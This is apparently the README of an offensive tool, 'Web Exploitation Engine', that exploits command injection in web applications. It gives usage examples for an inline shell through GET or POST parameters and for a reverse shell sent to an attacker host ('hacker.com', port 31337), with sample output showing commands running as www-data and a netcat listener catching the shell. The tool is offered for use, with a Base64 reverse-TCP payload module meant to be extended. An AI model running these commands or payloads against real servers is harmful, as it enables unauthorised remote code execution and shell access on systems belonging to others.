Web Exploitation Engine - Generic Command Injection Exploitation Utility.

This is a simple enough utility written to exploit command injection bugs in web applications.

I had abandoned this project a while ago, then saw the brilliant "rce.py" tool written by @LaNMaSteR53, and saw his elegant solution to the "how to denote where to put the payload" problem, so I shamelessly ripped his code to write this.

This tool can either give an inline shell like the original rce.py (it uses the same functions, just rewritten to suit), or a reverse shell. Currently it only supports a Base64 encoded Reverse TCP shell payload, however the magic of the "payloads" module is that you can actually expand it. You just have to do a little work to add more payloads.

So, how do I use this.

The only mandatory argument is --url='URL HERE'. In the url, using the tag, you specify where to inject code in the request.

For example: h4x# ./we.py --url='http://localhost/test/cmd.php?=' shell> id [*] Executed: id uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell>

By default, it assumes a GET request and uses the inline shell mode.

To specify a POST request, you pass the params and values just like a GET, except you specify --method=post to tell the parser it is a POST injection.

For example: h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=' --method=post shell> id [*] Executed: id uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell>

The --shell arguement tells it if you want an inline, or reverse shell. Default operation is the "inline shell" like the original rce.py script.

To do a reverse shell, --shell=reverse is needed. You also must specify the host and port to connect to.

--lhost and --lport arguments are, by default, 127.0.0.1 and 4444 respectively.

So, to get a reverse shell sent to port 31337 on "hacker.com", using the above GET request exploit, we can do the following.

h4x# ./we.py --url='http://localhost/test/cmd.php?cmd=' --shell=reverse --lhost=hacker.com --lport=31337 [+] Doing a reverse shell! [] LHOST: hacker.com [] LPORT: 31337 [!] Hope your listener is listening

And over at "hacker.com" (localhost on my box for this demo), we get the following:

nc -lvp 31337

listening on [any] 31337 ... connect to [127.0.0.1] from localhost [127.0.0.1] 58794 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $

Reverse shell access works rather flawlessly. For now, just the python-reverse payload, however I hope to add a python bindshell soon, along with, perhaps, some Perl payloads for extra fun.